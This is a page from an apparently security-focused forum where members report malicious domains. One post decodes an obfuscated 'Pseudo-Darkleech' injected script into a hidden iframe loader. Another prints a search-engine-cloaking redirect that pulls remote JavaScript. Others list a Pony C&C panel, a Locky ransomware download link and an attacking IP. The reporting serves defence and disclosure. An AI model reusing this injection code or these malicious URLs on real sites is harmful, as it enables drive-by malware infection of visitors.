121 123 u115 121 127 1cq25 35b 10q4 121 107 10b7 1q1d1 119 1i06- d,u124 93- 116 1b2s5 11ba7 125 118b 108 107 3h7 58- b58 35 ka104 kby1bw21 c106 107ce 1uc25 94q 116 119 1b2s1c 1b0ace8 8ne7 118 124 106 1t21 c127x 124 106 11-9 104 3d7 10-4t 121c 10h6 10be7 12e5 9ub4 116 119 z121 108 87 118 124 1-06 121 127 c12g4 10b6 j119c q1b0rex4 54 106a 125 104 116 121 123 125 48 55 67 70l 1e2a1 53e 98 v69 55 127 5a2 -58 58i b49 35 126 1q19 106 48e 119 1i1a8- 11o5 1-25 9b7 104 1ib06 t125c a1b07 107 75 1v11 113 -1cq08 123 -11e2 37 113 117 121r 127 125e 7o2a 121 123 ie115 a121 127 c125j aae35 119 11b8 115 12cc5 9-d7 10-4 m10ea6 125 10,7 10cd7 75 11b1 113n 10-8 c123 1-12 36 10kd4o 1bm21e 106 107 125t 94 116a- e1c19 121i 108 87 b118 124ka 106 12o1e 127 124 106 k1-19 1bo04 54 116 125 11ak8b 127m c10-8d 112 35 119 118 b1g15 125es 97 104 a10s6 125 b107 h107b 75 h1c11 113 vb108q 1.23 11c2- 51 51 49 9ga9o 1c04 121l 12b3 1-15la 1b21 1b27 125 78 1g21 11b6 1-09 g12e5 8j-7 126 37 104 e1r21 106 -107 12a5 94 116 119 121m 108 87 118 124 106 1b21 127 124 1-06q 119 bjcw1c04 5-f4 1b23 1gb12 d121 -10e6k 91 119c- 124 125 ea89 108u 48 119 118 11-b5 125k 97 104 1e06r, 125 107 107 75 1e11 11j3 108 1b23v 112-c, 49 qc3d-5 113 12c6 48 -1b07a 108- 12c1 108 109 107 e89 116 1p16 61 119 118 d123 116 11-3 123 u115 95 125 108 91 116 121 107 107 4a9- 99 o1b04 121z b107 -1l07- a111 119c 106 -124 93 116 12c5b 117 125 118 1b08 1h07ev 51 37 75 108 106-b r1d13 118 127 5-l4 12-b6 106 -119 1v17bk 9dn1b 112 121 10w6b- 91k 119 a124 125uc 48 48 48 11-9 1k18 115- 125 97 109 1c-04 75 e123 106 125 125a ub118 65 51 104 121 mb123 q115 -b121 w127 125 78 121bv 116 1d09 1k-b25 87- s126 b53- 33 4o7 49 70 -d124 11-p9 123 brd-v109- 11b7 125b 1c18jbmc 108v 93 117 122 125 a124 5w4 123 112 121 106 9a1 119 124 125r 8b9 108-k a48 1m07 11dz-1 113 108 b123 112 86 1h21 a-108 e-11dp3bp 110 b125 6eb1 124 119 123- 109 11n7 -1bm25 118 -1ci08 93c 117f 1b2-2 125 124 54 11x6 125 118a 12a7 108av 11c2 49 49 61 42 45 j4d5 y4b-9 35 10oe7 -111 113 1d08 123 ,11cu2 8-6 121b 108 113 110- 125 w5c1 51j 35 101 1d25me- k1c16i 1-07 125 99 apb119 118 11j5 1b25 97 w109 104 75c 123 106he 125s 125 -a118 -65s 37 e48 1j04 12-1 123e 1i15 121 a127 12i5 78e 121 116 1-09 125 8s7 126 53 -33 47e 49- 5f0 4-1 43 50 a1-1q9c 118 123 11d6b 113 123 115 95 12i5 108 9abb1v 1-16 b121w 107- 107 35 101 107 108 121 108 10e9 107 8g9 116 1d16 51 51 35 x101 67 69 67 58 -1ac23 119 118 107 108 106 eo10-e9 123 108 11n-9b 10-6 58 6a-9 6d7 58-y 123 1e19 118 j107 108 -10d6-j 10-9 c-12h3 -108 bta119u b106 58 69 48 104 -121 10m7 107 b-p1c1c1e 119r 106 124a m93e 1e16 12b-5 117 h125 118 10-8 1d07 49d 48 4b9 35-u-eldretei";
a=undefinedNew.replace(/[^\d ]/g,"").split(" ");

for (x=0;x<256;x++) {
for (i=0;i<a.length;i++) a[i]=parseInt(a[i])^x;
s=String.fromCharCode.apply(null,a);
 if (s.indexOf('MSIE')>0) break;
}

re = /="([^"]+)"/;
str=re.exec(s)[1];

imagePackage=0;
 
  onclickGetClass=2;
 
 documentEmbed=str;
 parseFloatOndragdrop=undefinedNew;
 statusAll=switchNative=imagePackage;
 passwordElements="";
 parseFloatOndragdrop=parseFloatOndragdrop.replace(/[^a-z]/g,"");
 for(onkeypressSwitch=imagePackage;onkeypressSwitch<parseFloatOndragdrop.length;onkeypressSwitch++)
 {
   packageValueOf=parseFloatOndragdrop.charCodeAt(onkeypressSwitch);
   if(statusAll%onclickGetClass)
   {
     passwordElements+=String.fromCharCode(((onkeyupScreenY+packageValueOf-97)^documentEmbed.charCodeAt(switchNative%documentEmbed.length))%255);
     switchNative++;
   }
   else
   {
     onkeyupScreenY=(packageValueOf-97)*13*onclickGetClass;
   }
   statusAll++;
 }
document.getElementById('output').value = passwordElements;
</script>


You will get the fully decoded result:

Code: [Select]
c="PHP_SESSION_PHP=221; path=/; expires="+new Date(new Date().getTime()+604800000).toUTCString();document.cookie=c;document.cookie="_"+c;document.write('<style>.bdqrwvmnggd{position:absolute;top:-633px;width:300px;height:300px;}</style><div class="bdqrwvmnggd"><iframe src="http://vandre.lilachillsranchhomes.com/QUwKWbAeqS_tw_vDFzVk.php" width="250" height="250"></iframe></div>');
Now we have a semi-automated solution for decoding current Pseudo-Darkleech version. All you need to do is replacing the content of "undefinedNew" by the
content of html section on top of the page from other compromised sites. Feel free to modify the code in a way that this content can be pasted into the textarea.
42
Malicious Domains / Re: PONY: davis-starndard.com
« Last post by BenENichols on April 19, 2016, 05:20:59 am »
Google knows about it.
43
Malicious Domains / PONY: davis-starndard.com
« Last post by Joker on April 16, 2016, 05:10:44 am »
A pony C&C has been found in the following locations:

hxxp://www.davis-starndard.com/davis/admin.php

hxxp://www.davis-starndard.com/dav/admin.php

Any possibility to list these?
44
Site / Forum Discussion / Noob question MDL
« Last post by nap0 on April 11, 2016, 09:33:56 am »
Hello, i want to make some newbie question about MDL

1. How does MDL collect their data?
2. How those data can be used (is this only to avoid those sites or are more uses?)
3. MDL collect only data only from malicious websites?
45
Malicious Domains / Re: Trojan Ransom
« Last post by Gnomo on April 04, 2016, 12:39:03 pm »
www.moorelegacygroup.com/ZNru8f.exe

Ransom Locky loaded by email malware.

Site owner has  been contacted on 3/29/16 no answer yet, link is active.

Regards
46
Malicious Domains / Re: Compromised Russian Webserver Bruting my RDP
« Last post by BenENichols on March 29, 2016, 01:04:14 am »
I actually forgot to setup this router, were blocking ALL of Russian ip space actually.
47
 8)

We have setup a script to automatically download and update the public feeds from Spamhaus and Dshield malicious hosts,  which is then combined and formatted into a RouterOS import script.

This is free for anybody looking for a comprehensive malicious ip blacklist solution to use with their Mikrotik Routeros firewall. 

http://www.squidblacklist.org/downloads/drop.malicious.rsc

And there is howto on our blog explaining how to automate the update process on a RouterOS Device.

http://blog.squidblacklist.org/?p=297

Enjoy!
48
Malicious Domains / Re: Compromised Russian Webserver Bruting my RDP
« Last post by dlipman on March 28, 2016, 10:52:09 pm »
From the IP address, you get the network and their IP range; 188.134.0.0 - 188.134.63.255.
Block the address range in the computer's Firewalll or on the enclave's perimeter Firewall.
49
Malicious Domains / Compromised Russian Webserver Bruting my RDP
« Last post by BenENichols on March 27, 2016, 01:22:19 am »
I get rdp bruted all the time, I just happened to notice my firewall blocking this one while working. Figured I would share it, nmapped the ip, port 80 was open, so I found the domain name.

Server Type    Status    ContentType
Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.14    200 OK    text/html; charset=UTF-8

host - 188x134x1x20.static-business.iz.ertelecom.ru

http://bazamaria.ru/

http://188.134.1.20/

50
Malicious Domains / ausbildung-passgenau.de – a potpourri of badware!
« Last post by neeklamy on March 15, 2016, 09:47:18 pm »
There’s a few subdomains at ausbildung-passgenau.de that have pages that if visited from a search engine results page (so there’s a certain document referrer), will then redirect to a randomised pick of malware, fake anti-virus and advertising sites.

Interestingly, it looks like only pages at the subdomains are infected. These are a few of the subdomains:
  • fullfilescenter.ausbildung-passgenau.de
  • newfiles2016.ausbildung-passgenau.de
  • fastwindows2016.ausbildung-passgenau.de
This Google search results page will show any of the links in action: https://www.google.co.uk/search?q=site:ausbildung-passgenau.de

This is the JavaScript doing the dirty work:

Code: [Select]
<script type="text/javascript">
(0 <= window.navigator.userAgent.indexOf("Rambler")
|| 0 <= window.navigator.userAgent.indexOf("Yandex")
|| 0 <= window.navigator.userAgent.indexOf("Google")
|| 0 <= window.navigator.userAgent.indexOf("Yaho")
|| 0 <= window.navigator.userAgent.indexOf("Googlebot")
|| 0 <= window.navigator.userAgent.indexOf("Turtle")) && Break();
var ref = document.referrer;
if (ref.length != 0) {
  if ((ref.indexOf("yandex.") > 0 && ref.indexOf("text=") > 0)
  || (ref.indexOf("google.") > 0)
  || ref.indexOf("rambler.") > 0
  || ref.indexOf("bing.") > 0
  || ref.indexOf("mail.") > 0
  || ref.indexOf("yahoo.") > 0
  || ref.indexOf("msn.") > 0
  || ref.indexOf("live.") > 0
  || ref.indexOf("vk.") > 0
  || showme == 'force') {
    document.write('<sc' + 'ript type="text/javascript" src="http://d2gyAAiuYBY2TUpxpe.scriptserver.ru/indianajones/index_download.js"></sc' + 'ript>');
  }
}
</script>
Pages: 1 ... 3 4 [5] 6 7 ... 10